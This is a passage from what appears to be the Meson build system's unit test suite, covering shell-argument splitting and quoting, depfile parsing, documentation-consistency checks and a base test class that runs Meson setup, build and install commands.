msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
            # line continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
        errors = [] # type: T.List[T.Tuple[Path, Exception]]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
                    self.fail('A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
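        # Return the markdown text between the heading named `name` and the
        # next heading in `sections` (or the end of `md`).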
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.BUILTIN_OPTIONS.keys(),
*mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
        Test that each markdown file in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
        Ensure that all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
        data_files = [] # type: T.List[T.Tuple[str, str]]
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
from pprint import pprint
current_files = set(mesondata.keys())
scanned_files = set([x[0] for x in data_files])
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
        # If this call hangs, CI will just abort. It is very hard to distinguish
        # between a CI issue and a test bug in that case. Set a timeout and fail
        # loudly instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
with mock.patch.dict(os.environ, override_envvars):
run_mtest_inprocess(['-C', self.builddir])
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
        Run a Ninja target while printing its stdout and stderr to stdout,
        and also return a copy of the output
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
        # If Ninja is using .rsp files, generate them, read their contents, and
        # use them as the command for each compile command in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
        Fetch a list of command lines run by Meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def get_meson_log_sanitychecks(self):
'''
Same as above, but for the sanity checks that were run
'''
log = self.get_meson_log()
prefix = 'Sanity check compiler command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
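        # Strip the extension and any 'lib'/'cyg' prefix to recover the target
        # name from an output filename.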
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
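            # Collect every target that ninja reported as linked during this build.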
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
